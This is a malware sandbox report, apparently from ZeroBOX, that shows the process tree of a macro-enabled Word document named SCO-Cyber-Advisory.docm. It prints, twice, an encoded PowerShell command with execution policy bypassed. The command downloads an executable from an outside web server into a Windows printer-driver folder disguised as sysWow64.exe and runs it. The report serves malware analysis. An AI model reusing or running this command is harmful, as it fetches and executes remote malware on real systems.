| ZeroBOX

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\SCO-Cyber-Advisory.docm
1336
- cmd.exe cmd /cpowershell -ep Bypass -encodedcommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgAGgAdAB0AHAAcwA6AC8ALwBuAGEAdABpAG8AbgBhAGwAYwBvAGwAbABlAGcAZQAuAGUAZAB1AC4AbgBwAC8AYQBkAG0AaQBuAC8AYQBzAHMAZQB0AHMALwBqAHMALwBqAHEAdQBlAHIAeQAvAHQAaQBuAHkALwBwAGwAdQBnAGkAbgBzAC8AYQBuAGMAaABvAHIALwAuAGEAbgBjAGgAbwByAC8AcwB5AHMAVwBvAHcANgA0AC4AZQB4AGUAIAAtAE8AdQB0AGYAaQBsAGUAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABzAHAAbwBvAGwAXABkAHIAaQB2AGUAcgBzAFwAYwBvAGwAbwByAFwAcwB5AHMAVwBvAHcANgA0AC4AZQB4AGUAIgA7AGMAbQBkACAALwBjACAAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAcwBwAG8AbwBsAFwAZAByAGkAdgBlAHIAcwBcAGMAbwBsAG8AcgBcAHMAeQBzAFcAbwB3ADYANAAuAGUAeABlAA==
  2528
  - powershell.exe powershell -ep Bypass -encodedcommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgAGgAdAB0AHAAcwA6AC8ALwBuAGEAdABpAG8AbgBhAGwAYwBvAGwAbABlAGcAZQAuAGUAZAB1AC4AbgBwAC8AYQBkAG0AaQBuAC8AYQBzAHMAZQB0AHMALwBqAHMALwBqAHEAdQBlAHIAeQAvAHQAaQBuAHkALwBwAGwAdQBnAGkAbgBzAC8AYQBuAGMAaABvAHIALwAuAGEAbgBjAGgAbwByAC8AcwB5AHMAVwBvAHcANgA0AC4AZQB4AGUAIAAtAE8AdQB0AGYAaQBsAGUAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABzAHAAbwBvAGwAXABkAHIAaQB2AGUAcgBzAFwAYwBvAGwAbwByAFwAcwB5AHMAVwBvAHcANgA0AC4AZQB4AGUAIgA7AGMAbQBkACAALwBjACAAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAcwBwAG8AbwBsAFwAZAByAGkAdgBlAHIAcwBcAGMAbwBsAG8AcgBcAHMAeQBzAFcAbwB3ADYANAAuAGUAeABlAA==
    2396
    - cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\System32\spool\drivers\color\sysWow64.exe
      1688

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents